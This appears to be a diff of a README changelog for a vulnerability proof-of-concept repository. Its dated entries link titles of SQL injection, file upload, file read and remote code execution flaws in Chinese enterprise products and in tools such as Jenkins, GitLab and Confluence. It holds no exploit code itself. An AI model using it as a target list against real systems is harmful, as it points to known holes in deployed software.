+- [中成科信票务管理平台任意文件上传漏洞](./中成科信票务管理系统/中成科信票务管理平台任意文件上传漏洞.md)
+- [Springblade默认密钥可伪造凭据](./SpringBlade/Springblade默认密钥可伪造凭据.md)
+- [CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞](./路由器/CERIO-DT系列路由器Save.cgi接口存在命令执行漏洞.md)
 
 ## 2024.03.12 新增漏洞
-- 宏景HCM-codesettree接口存在SQL注入漏洞 
-- SpringBlade blade-log存在SQL 注入漏洞
-- 宏景HCM-downlawbase接口存在SQL注入漏洞
-- 天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞
-- H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞
-- 网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)
-- 大华智慧园区clientServer接口SQL注入漏洞
-- 大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞
-- 网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞
-- 网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022)
-- 用友NC-saveDoc.ajax存在任意文件上传漏洞
-- 亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞
-- 海康威视综合安防系统detection接口存在RCE漏洞
+- [宏景HCM-codesettree接口存在SQL注入漏洞 ](./宏景OA/宏景HCM-codesettree接口存在SQL注入漏洞.md)
+- [SpringBlade blade-log存在SQL 注入漏洞](./SpringBlade/SpringBlade%20blade-log存在SQL%20注入漏洞.md)
+- [宏景HCM-downlawbase接口存在SQL注入漏洞](./宏景OA/宏景HCM-downlawbase接口存在SQL注入漏洞.md)
+- [天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞](./天问物业ERP系统/天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞.md)
+- [H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞](./H3C/H3C%20用户自助服务平台%20dynamiccontent.properties.xhtml存在RCE漏洞.md)
+- [网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)](./网康科技/网康科技%20NS-ASG%20应用安全网关%20SQL注入漏洞(CVE-2024-2330).md)
+- [大华智慧园区clientServer接口SQL注入漏洞](./大华/大华智慧园区clientServer接口SQL注入漏洞.md)
+- [大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞](./大华/大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞.md)
+- [网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞](./网康科技/网康NS-ASG应用安全网关singlelogin.php存在SQL注入漏洞.md)
+- [网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022)](./网康科技/网康科技NS-ASG应用安全网关list_ipAddressPolicy.php存在SQL注入漏洞(CVE-2024-2022).md)
+- [用友NC-saveDoc.ajax存在任意文件上传漏洞](./用友OA/用友NC-saveDoc.ajax存在任意文件上传漏洞.md)
+- [亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞.md)
+- [海康威视综合安防系统detection接口存在RCE漏洞](./海康威视/海康威视综合安防系统detection接口存在RCE漏洞.md)
   
 ## 2024.03.05 新增漏洞
-- H3C-校园网自助服务系统flexfileupload任意文件上传漏洞
-- 绿盟日志审计系统存在命令执行漏洞
-- JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)
-- H3C-SecParh堡垒机任意用户登录漏洞
-- 红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞
-- 致远前台任意用户密码修改
-- JEEVMS仓库管理系统任意文件读取漏洞
-- 海康威视iVMS综合安防系统resourceOperations接口任意文件上传漏洞
-- WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600)
-- 大华EIMS-capture_handle接口远程命令执行漏洞
-- 帮管客CRM-jiliyu接口存在SQL漏洞
+- [H3C-校园网自助服务系统flexfileupload任意文件上传漏洞](./H3C/H3C-校园网自助服务系统flexfileupload任意文件上传漏洞.md)
+- [绿盟日志审计系统存在命令执行漏洞](./绿盟/绿盟日志审计系统存在命令执行漏洞.md)
+- [JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)](./JetBrains/JetBrains%20TeamCity%20身份验证绕过漏洞(CVE-2024-27198).md)
+- [H3C-SecParh堡垒机任意用户登录漏洞](./H3C/H3C-SecParh堡垒机任意用户登录漏洞.md)
+- [红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞](./红帆OA/红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞.md)
+- [致远前台任意用户密码修改](./致远OA/致远前台任意用户密码修改.md)
+- [JEEVMS仓库管理系统任意文件读取漏洞](./JEEVMS仓库管理系统/JEEVMS仓库管理系统任意文件读取漏洞.md)
+- [海康威视iVMS综合安防系统resourceOperations接口任意文件上传漏洞](./海康威视/海康威视iVMS综合安防系统resourceOperations接口任意文件上传漏洞.md)
+- [WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600)](./WordPress/WordPress插件Bricks%20Builder存在RCE漏洞(CVE-2024-25600).md)
+- [大华EIMS-capture_handle接口远程命令执行漏洞](./大华/大华EIMS-capture_handle接口远程命令执行漏洞.md)
+- [帮管客CRM-jiliyu接口存在SQL漏洞](./帮管客CRM/帮管客CRM-jiliyu接口存在SQL漏洞.md)
   
 ## 2024.03.01 新增漏洞
-- RG-UAC锐捷统一上网行为管理与审计系统存在远程代码执行漏洞
-- RUOYI-v4.7.8存在远程代码执行漏洞
-- 西软云XMS-futurehotel-query接口存在XXE漏洞
-- 西软云XMS-futurehotel-operate接口存在XXE漏洞
-- 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞
-- 用友U9-UMWebService.asmx存在文件读取漏洞
-- 用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞
-- 用友U8 Cloud-ArchiveVerify存在SQL注入漏洞
-- 易宝OA系统DownloadFile接口存在文件读取漏洞
-- 浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞
-- 惠尔顿-网络安全审计系统存在任意文件读取漏洞
-- 蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞
+- [RG-UAC锐捷统一上网行为管理与审计系统存在远程代码执行漏洞](./锐捷/RG-UAC锐捷统一上网行为管理与审计系统存在远程代码执行漏洞.md)
+- [RUOYI-v4.7.8存在远程代码执行漏洞](./RuoYi/RUOYI-v4.7.8存在远程代码执行漏洞.md)
+- [西软云XMS-futurehotel-query接口存在XXE漏洞](./西软云/西软云XMS-futurehotel-query接口存在XXE漏洞.md)
+- [西软云XMS-futurehotel-operate接口存在XXE漏洞](./西软云/西软云XMS-futurehotel-operate接口存在XXE漏洞.md)
+- [宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞](./宏景OA/宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md)
+- [用友U9-UMWebService.asmx存在文件读取漏洞](./用友OA/用友U9-UMWebService.asmx存在文件读取漏洞.md)
+- [用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞](./用友OA/用友U8%20Cloud-KeyWordReportQuery存在SQL注入漏洞.md)
+- [用友U8 Cloud-ArchiveVerify存在SQL注入漏洞](./用友OA/用友U8%20Cloud-ArchiveVerify存在SQL注入漏洞.md)
+- [易宝OA系统DownloadFile接口存在文件读取漏洞](./易宝OA/易宝OA系统DownloadFile接口存在文件读取漏洞.md)
+- [浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞](./浙大恩特客户资源管理系统/浙大恩特客户资源管理系统-purchaseaction.entphone接口存在SQL漏洞.md)
+- [惠尔顿-网络安全审计系统存在任意文件读取漏洞](./惠尔顿-网络安全审计系统/惠尔顿-网络安全审计系统存在任意文件读取漏洞.md)
+- [蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞](./蓝凌OA/蓝凌EIS智慧协同平台rpt_listreport_definefield.aspx接口存在SQL注入漏洞.md)
   
 ## 2024.02.28 新增漏洞
-- 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞
-- 万户OA-RhinoScriptEngineService命令执行漏洞
-- 宏景 DisplayFiles任意文件读取
-- 蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞
-- 用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞
-- aiohttp存在目录遍历漏洞(CVE-2024-23334)
+- [鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞](./通天星/鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md)
+- [万户OA-RhinoScriptEngineService命令执行漏洞](./万户OA/万户OA-RhinoScriptEngineService命令执行漏洞.md)
+- [宏景 DisplayFiles任意文件读取](./宏景OA/宏景%20DisplayFiles任意文件读取.md)
+- [蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞](./蓝凌OA/蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md)
+- [用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞](./用友OA/用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞.md)
+- [aiohttp存在目录遍历漏洞(CVE-2024-23334)](./aiohttp/aiohttp存在目录遍历漏洞(CVE-2024-23334).md)
   
 ## 2024.02.17 新增漏洞
-- 宝塔最新未授权访问漏洞及sql注入
-- 金盘移动图书馆系统存在任意文件上传漏洞
-- Panalog大数据日志审计系统libres_syn_delete.php存在命令执行
-- WAGO系统远程代码执行漏洞(CVE-2023-1698)
-- 山石网科云鉴存在前台任意命令执行漏洞
+- [宝塔最新未授权访问漏洞及sql注入](./宝塔/宝塔最新未授权访问漏洞及sql注入.md)
+- [金盘移动图书馆系统存在任意文件上传漏洞](./金盘移动图书馆系统/金盘移动图书馆系统存在任意文件上传漏洞.md)
+- [Panalog大数据日志审计系统libres_syn_delete.php存在命令执行](./Panalog/Panalog大数据日志审计系统libres_syn_delete.php存在命令执行.md)
+- [WAGO系统远程代码执行漏洞(CVE-2023-1698)](./WAGO/WAGO系统远程代码执行漏洞(CVE-2023-1698).md)
+- [山石网科云鉴存在前台任意命令执行漏洞](./山石网科云鉴/山石网科云鉴存在前台任意命令执行漏洞.md)
   
 ## 2024.02.5 新增漏洞
-- 天翼应用虚拟化系统sql注入漏洞
-- LinkWeChat任意文件读取漏洞
-- Weblogic远程代码执行(CVE-2024-20931)
-- 亿赛通-dataSearch.jsp-SQL注入
+- [天翼应用虚拟化系统sql注入漏洞](./天翼应用虚拟化系统/天翼应用虚拟化系统sql注入漏洞.md)
+- [LinkWeChat任意文件读取漏洞](./LinkWeChat/LinkWeChat任意文件读取漏洞.md)
+- [Weblogic远程代码执行(CVE-2024-20931)](./Weblogic/Weblogic远程代码执行(CVE-2024-20931).md)
+- [亿赛通-dataSearch.jsp-SQL注入](./亿赛通电子文档安全管理系统/亿赛通-dataSearch.jsp-SQL注入.md)
   
 ## 2024.02.2 新增漏洞
-- 亿赛通电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞
-- 亿赛通电子文档安全管理系统GetValidateLoginUserService接口存在XStream反序列化漏洞
-- 亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞
-- 大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞
-- 飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞
+- [亿赛通电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统%20UploadFileToCatalog%20SQL注入漏洞.md)
+- [亿赛通电子文档安全管理系统GetValidateLoginUserService接口存在XStream反序列化漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统GetValidateLoginUserService接口存在XStream反序列化漏洞.md)
+- [亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞.md)
+- [大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞](./大华/大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞.md)
+- [飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞](./飞企互联/飞企互联-FE企业运营管理平台publicData.jsp存在SQL注入漏洞.md)
   
 ## 2024.01.26 新增漏洞
-- Jenkins任意文件读取漏洞(CVE-2024-23897)
-- SpringBlade export-user SQL 注入漏洞
-- 万户OA text2Html接口存在任意文件读取漏洞
-- 亿赛通电子文档安全管理系统hiddenWatermark文件上传漏洞
-- 用友系统-U9企业版存在任意文件上传漏洞
-- 广联达-linkworks-gwgdwebservice存在SQL注入漏洞
-- 远秋医学培训系统未授权查看密码
-- 联软安全数据交换系统任意文件读取
-- Apache Tomcat存在信息泄露漏洞( CVE-2024-21733)
+- [Jenkins任意文件读取漏洞(CVE-2024-23897)](./Jenkins/Jenkins任意文件读取漏洞(CVE-2024-23897).md)
+- [SpringBlade export-user SQL 注入漏洞](./SpringBlade/SpringBlade%20export-user%20SQL%20注入漏洞.md)
+- [万户OA text2Html接口存在任意文件读取漏洞](./万户OA/万户OA%20text2Html接口存在任意文件读取漏洞.md)
+- [亿赛通电子文档安全管理系统hiddenWatermark文件上传漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统hiddenWatermark文件上传漏洞.md)
+- [用友系统-U9企业版存在任意文件上传漏洞](./用友OA/用友系统-U9企业版存在任意文件上传漏洞.md)
+- [广联达-linkworks-gwgdwebservice存在SQL注入漏洞](./广联达OA/广联达-linkworks-gwgdwebservice存在SQL注入漏洞.md)
+- [远秋医学培训系统未授权查看密码](./远秋医学培训系统/远秋医学培训系统未授权查看密码.md)
+- [联软安全数据交换系统任意文件读取](./联软/联软安全数据交换系统任意文件读取.md)
+- [Apache Tomcat存在信息泄露漏洞( CVE-2024-21733)](./Apache/Apache%20Tomcat存在信息泄露漏洞(%20CVE-2024-21733).md)
   
 ## 2024.01.17 新增漏洞
-- Yearning_front任意文件读取
-- 云网OA8.6存在fastjson反序列化漏洞
-- Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546)
-- 先锋WEB燃气收费系统文件上传漏洞
-- MRCMS3.0任意文件读取漏洞
-- 奇安信天擎rptsvr任意文件上传
-- 用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞
-- Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887)
-- 天擎终端安全管理系统YII_CSRF_TOKEN远程代码执行漏洞
-- 用友移动系统管理getFileLocal接口存在任意文件读取
-- 网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞
-- Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)
-- Laykefu客服系统任意文件上传漏洞
+- [Yearning_front任意文件读取](./Yearning/Yearning_front任意文件读取.md)
+- [云网OA8.6存在fastjson反序列化漏洞](./云网OA/云网OA8.6存在fastjson反序列化漏洞.md)
+- [Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546)](./Apache/Apache%20Dubbo-admin-authorized-bypass%20(CNVD-2023-96546).md)
+- [先锋WEB燃气收费系统文件上传漏洞](./先锋WEB燃气收费系统/先锋WEB燃气收费系统文件上传漏洞.md)
+- [MRCMS3.0任意文件读取漏洞](./MRCMS/MRCMS3.0任意文件读取漏洞.md)
+- [奇安信天擎rptsvr任意文件上传](./天擎/奇安信天擎rptsvr任意文件上传.md)
+- [用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞](./用友OA/用友GRP-U8-SelectDMJE.jsp_SQL注入漏洞.md)
+- [Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887)](./Ivanti/Ivanti_Connect_Secure远程命令注入漏洞(CVE-2024-21887).md)
+- [天擎终端安全管理系统YII_CSRF_TOKEN远程代码执行漏洞](./天擎/天擎终端安全管理系统YII_CSRF_TOKEN远程代码执行漏洞.md)
+- [用友移动系统管理getFileLocal接口存在任意文件读取](./用友OA/用友移动系统管理getFileLocal接口存在任意文件读取.md)
+- [网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞](./网神/网神SecGate%203600%20防火墙sys_hand_upfile%20任意文件上传漏洞.md)
+- [Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)](./Confluence/Atlassian%20Confluence%20远程代码执行漏洞(CVE-2023-22527).md)
+- [Laykefu客服系统任意文件上传漏洞](./Laykefu客服系统/Laykefu客服系统任意文件上传漏洞.md)
 
 ## 2024.01.12 新增漏洞
-- GitLab任意用户密码重置漏洞(CVE-2023-7028)
-- SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195)
-- 亿赛通电子文档安全管理系统dump接口存在任意文件读取漏洞
-- 金和OA_SAP_B1Config.aspx未授权访问漏洞
-- 致远OA_getAjaxDataServlet接口存在任XXE漏洞
-- 金和OA_jc6_ntko-upload任意文件上传漏洞
-- 蓝凌EIS智慧协同平台多个接口SQL注入
-- 金和OA_CarCardInfo.aspx_SQL注入漏洞
-- 金和OA_MailTemplates.aspx_SQL注入漏洞
-- 金和OA_upload_json.asp存在任意文件上传漏洞
-- 金和OA_uploadfileeditorsave接口存在任意文件上传漏洞
-- Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305)
-- 金和OA_jc6_Upload任意文件上传
-- Apache_Solr环境变量信息泄漏漏洞(CVE-2023-50290)
-- 浙大恩特客户资源管理系统crmbasicaction任意文件上传
+- [GitLab任意用户密码重置漏洞(CVE-2023-7028)](./GitLab/GitLab任意用户密码重置漏洞(CVE-2023-7028).md)
+- [SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195)](./SpiderFlow爬虫平台/SpiderFlow爬虫平台远程命令执行漏洞(CVE-2024-0195).md)
+- [亿赛通电子文档安全管理系统dump接口存在任意文件读取漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档安全管理系统dump接口存在任意文件读取漏洞.md)
+- [金和OA_SAP_B1Config.aspx未授权访问漏洞](./金和OA/金和OA_SAP_B1Config.aspx未授权访问漏洞.md)
+- [致远OA_getAjaxDataServlet接口存在任XXE漏洞](./致远OA/致远OA_getAjaxDataServlet接口存在任XXE漏洞.md)
+- [金和OA_jc6_ntko-upload任意文件上传漏洞](./金和OA/金和OA_jc6_ntko-upload任意文件上传漏洞.md)
+- [蓝凌EIS智慧协同平台多个接口SQL注入](./蓝凌OA/蓝凌EIS智慧协同平台多个接口SQL注入.md)
+- [金和OA_CarCardInfo.aspx_SQL注入漏洞](./金和OA/金和OA_CarCardInfo.aspx_SQL注入漏洞.md)
+- [金和OA_MailTemplates.aspx_SQL注入漏洞](./金和OA/金和OA_MailTemplates.aspx_SQL注入漏洞.md)
+- [金和OA_upload_json.asp存在任意文件上传漏洞](./金和OA/金和OA_upload_json.asp存在任意文件上传漏洞.md)
+- [金和OA_uploadfileeditorsave接口存在任意文件上传漏洞](./金和OA/金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md)
+- [Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305)](./Ncast高清智能录播系统/Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305).md)
+- [金和OA_jc6_Upload任意文件上传](./金和OA/金和OA_jc6_Upload任意文件上传.md)
+- [Apache_Solr环境变量信息泄漏漏洞(CVE-2023-50290)](./Apache/Apache_Solr环境变量信息泄漏漏洞(CVE-2023-50290).md)
+- [浙大恩特客户资源管理系统crmbasicaction任意文件上传](./浙大恩特客户资源管理系统/浙大恩特客户资源管理系统crmbasicaction任意文件上传.md)
 
 ## 2024.01.09 新增漏洞
-- 金和OA_HomeService.asmxSQL注入
-- 用友移动管理平台uploadIcon任意文件上传漏洞
-- 捷诚管理信息系统sql注入漏洞
-- 奇安信网康下一代防火墙directdata存在远程命令执行漏洞
+- [金和OA_HomeService.asmxSQL注入](./金和OA/金和OA_HomeService.asmxSQL注入.md)
+- [用友移动管理平台uploadIcon任意文件上传漏洞](./用友OA/用友移动管理平台uploadIcon任意文件上传漏洞.md)
+- [捷诚管理信息系统sql注入漏洞](./捷诚管理信息系统/捷诚管理信息系统sql注入漏洞.md)
+- [奇安信网康下一代防火墙directdata存在远程命令执行漏洞](./天擎/奇安信网康下一代防火墙directdata存在远程命令执行漏洞.md)
   
 ## 2024.01.05 新增漏洞
-- 用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入
-- IDocView_qJvqhFt接口任意文件读取
-- ⻜企互联loginService任意登录
-- 全程云OA__ajax.ashxSQL注入漏洞
-- 泛微移动管理平台lang2sql接口任意文件上传
-- 广联达OA任意用户登录
-- 广联达OA前台任意文件上传
-- 金蝶EAS_pdfviewlocal任意文件读取漏洞
-- PbootCMS全版本后台通杀任意代码执行漏洞
+- [用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入](./用友OA/用友NC_CLOUD_smartweb2.RPC.d_XML外部实体注入.md)
+- [IDocView_qJvqhFt接口任意文件读取](./iDocView/IDocView_qJvqhFt接口任意文件读取.md)
+- [⻜企互联loginService任意登录](./飞企互联/⻜企互联loginService任意登录.md)
+- [全程云OA__ajax.ashxSQL注入漏洞](./全程云OA/全程云OA__ajax.ashxSQL注入漏洞.md)
+- [泛微移动管理平台lang2sql接口任意文件上传](./泛微OA/泛微移动管理平台lang2sql接口任意文件上传.md)
+- [广联达OA任意用户登录](./广联达OA/广联达OA任意用户登录.md)
+- [广联达OA前台任意文件上传](./广联达OA/广联达OA前台任意文件上传.md)
+- [金蝶EAS_pdfviewlocal任意文件读取漏洞](./金蝶/金蝶EAS_pdfviewlocal任意文件读取漏洞.md)
+- [PbootCMS全版本后台通杀任意代码执行漏洞](./PbootCMS/PbootCMS全版本后台通杀任意代码执行漏洞.md)
 
 ## 2024.01.03 新增漏洞
-- 天融信TOPSEC_maincgi.cgi远程命令执行
-- 天融信TOPSEC_static_convert远程命令执行漏洞
-- 用友CRM系统存在逻辑漏洞直接登录后台
-- 亿赛通电子文档uploadFile接口文件上传漏洞
+- [天融信TOPSEC_maincgi.cgi远程命令执行](./天融信/天融信TOPSEC_maincgi.cgi远程命令执行.md)
+- [天融信TOPSEC_static_convert远程命令执行漏洞](./天融信/天融信TOPSEC_static_convert远程命令执行漏洞.md)
+- [用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台](./用友OA/用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md)
+- [亿赛通电子文档uploadFile接口文件上传漏洞](./亿赛通电子文档安全管理系统/亿赛通电子文档uploadFile接口文件上传漏洞.md)
 
 ## 2023.12.31 新增漏洞
-- OfficeWeb365_任意文件读取漏洞
-- 东华医疗协同办公系统反序列化漏洞
-- 东华医疗协同办公系统文件上传
-- 飞企互联-FE企业运营管理平台登录绕过漏洞
-- 飞企互联Ognl表达式注入导致RCE
-- 西软云XMS反序列化漏洞
-- 用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞
-- 用友NC_Cloud_soapFormat.ajax接口存在XXE
+- [OfficeWeb365_任意文件读取漏洞](./OfficeWeb365/OfficeWeb365_任意文件读取漏洞.md)
+- [东华医疗协同办公系统反序列化漏洞](./东华医疗协同办公系统/东华医疗协同办公系统反序列化漏洞.md)
+- [东华医疗协同办公系统文件上传](./东华医疗协同办公系统/东华医疗协同办公系统文件上传.md)
+- [飞企互联-FE企业运营管理平台登录绕过漏洞](./飞企互联/飞企互联-FE企业运营管理平台登录绕过漏洞.md)
+- [飞企互联Ognl表达式注入导致RCE](./飞企互联/飞企互联Ognl表达式注入导致RCE.md)
+- [西软云XMS反序列化漏洞](./西软云/西软云XMS反序列化漏洞.md)
+- [用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞](./用友OA/用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md)
+- [用友NC_Cloud_soapFormat.ajax接口存在XXE](./用友OA/用友NC_Cloud_soapFormat.ajax接口存在XXE.md)
   
 ## 2023.12.28 新增漏洞
-- wordpress listingo 文件上传漏洞
-- Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467)
-- 福建科立讯通信有限公司指挥调度管理平台RCE
-- 海康威视-综合安防管理平台-files-文件读取
-- Apache OFBiz SSRF && 任意配置读取
-- Apache Dubbo 反序列化漏洞（CVE-2023-29234）
+- [wordpress listingo 文件上传漏洞](./WordPress/wordpress%20listingo%20文件上传漏洞.md)
+- [Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467)](./Apache/Apache%20OFBiz%20身份验证绕过漏洞%20(CVE-2023-51467).md)
+- [福建科立讯通信有限公司指挥调度管理平台RCE](./福建科立讯通信/福建科立讯通信有限公司指挥调度管理平台RCE.md)
+- [海康威视-综合安防管理平台-files-文件读取](./海康威视/海康威视-综合安防管理平台-files-文件读取.md)
+- [Apache OFBiz SSRF && 任意配置读取](./Apache/Apache%20OFBiz%20SSRF%20&&%20任意配置读取.md)
+- [Apache Dubbo 反序列化漏洞（CVE-2023-29234）](./Apache/Apache%20Dubbo%20反序列化漏洞（CVE-2023-29234）.md)
 
 ## 2023.12.26 新增漏洞
-- 大华DSS itcBulletin SQL 注入漏洞
-- 湖南建研-检测系统 admintool 任意文件上传
-- OpenSSH ProxyCommand命令注入漏洞 (CVE-2023-51385)
-- Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)
-- 金蝶Apusic应用服务器loadTree JNDI注入漏洞
-- 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞
-- Secnet安网 智能AC管理系统 actpt_5g 信息泄露
-- 海康威视安全接入网关任意文件读取漏洞
-- 浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞
-- 海翔ERP SQL注入漏洞
-- 脸爱云 一脸通智慧管理平台任意用户添加漏洞
-- 安恒明御安全网关远程命令执行漏洞
+- [大华DSS itcBulletin SQL 注入漏洞](./大华/大华DSS%20itcBulletin%20SQL%20注入漏洞.md)
+- [湖南建研-检测系统 admintool 任意文件上传](./湖南建研检测系统/湖南建研-检测系统%20admintool%20任意文件上传.md)
+- [OpenSSH ProxyCommand命令注入漏洞 (CVE-2023-51385)](./OpenSSH/OpenSSH%20ProxyCommand命令注入漏洞%20(CVE-2023-51385).md)
+- [Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)](./Salia/Salia%20PLCC%20cPH2%20远程命令执行漏洞(CVE-2023-46359).md)
+- [金蝶Apusic应用服务器loadTree JNDI注入漏洞](./金蝶/金蝶Apusic应用服务器loadTree%20JNDI注入漏洞.md)
+- [科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞](./科荣AIO/科荣%20AIO任意文件上传-目录遍历-任意文件读取漏洞.md)
+- [Secnet安网 智能AC管理系统 actpt_5g 信息泄露](./Secnet安网智能AC管理系统/Secnet安网%20智能AC管理系统%20actpt_5g%20信息泄露.md)
+- [海康威视安全接入网关任意文件读取漏洞](./海康威视/海康威视安全接入网关任意文件读取漏洞.md)
+- [浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞](./浙江宇视/浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md)
+- [海翔ERP SQL注入漏洞](./海翔ERP/海翔ERP%20SQL注入漏洞.md)
+- [脸爱云 一脸通智慧管理平台任意用户添加漏洞](./脸爱云一脸通智慧管理平台/脸爱云%20一脸通智慧管理平台任意用户添加漏洞.md)
+- [安恒明御安全网关远程命令执行漏洞](./安恒/安恒明御安全网关远程命令执行漏洞.md)
 
 ## 2023.12.23 新增漏洞
-- avcon综合管理平台SQL注入漏洞
-- 致远互联FE协作办公平台editflow_manager存在sql注入漏洞
-- 海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行
-- 铭飞CMS list接口存在SQL注入
-- 海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893
+- [avcon综合管理平台SQL注入漏洞](./AVCON/avcon综合管理平台SQL注入漏洞.md)
+- [致远互联FE协作办公平台editflow_manager存在sql注入漏洞](./致远OA/致远互联FE协作办公平台editflow_manager存在sql注入漏洞.md)
+- [海康威视CVE-2023-6895 IP网络对讲广播系统远程命令执行](./海康威视/海康威视CVE-2023-6895%20IP网络对讲广播系统远程命令执行.md)
+- [铭飞CMS list接口存在SQL注入](./铭飞/铭飞CMS%20list接口存在SQL注入.md)
+- [海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893](./海康威视/海康威视IP网络对讲广播系统任意文件下载漏洞CVE-2023-6893.md)
   
 ## 2023.12.17 新增漏洞
-- 大华智能物联综合管理平台justForTest用户登录漏洞
-- CloudPanel RCE漏洞 CVE-2023-35885
-- Smartbi 内置用户登陆绕过
-- 金和OA jc6 clobfield SQL注入漏洞
-- EasyCVR 视频管理平台存在用户信息泄露
-- 用友CRM 任意文件读取漏洞
-- 金蝶星空云K3Cloud反序列化漏洞
+- [大华智能物联综合管理平台justForTest用户登录漏洞](./大华/大华智能物联综合管理平台justForTest用户登录漏洞.md)
+- [CloudPanel RCE漏洞 CVE-2023-35885](./CloudPanel/CloudPanel%20RCE漏洞%20CVE-2023-35885.md)
+- [Smartbi 内置用户登陆绕过](./Smartbi/Smartbi%20内置用户登陆绕过.md)
+- [金和OA jc6 clobfield SQL注入漏洞](./金和OA/金和OA%20jc6%20clobfield%20SQL注入漏洞.md)
+- [EasyCVR 视频管理平台存在用户信息泄露](./EasyCVR视频管理平台/EasyCVR%20视频管理平台存在用户信息泄露.md)
+- [用友CRM 任意文件读取漏洞](./用友OA/用友CRM%20任意文件读取漏洞.md)
+- [金蝶星空云K3Cloud反序列化漏洞](./金蝶/金蝶星空云K3Cloud反序列化漏洞.md)
 
 ## 2023.12.15 新增漏洞
-- 万户ezoffice wpsservlet任意文件上传漏洞
-- 万户 ezOFFICE DocumentEdit.jsp SQL注入
-- 用友 NC uapws wsdl XXE漏洞
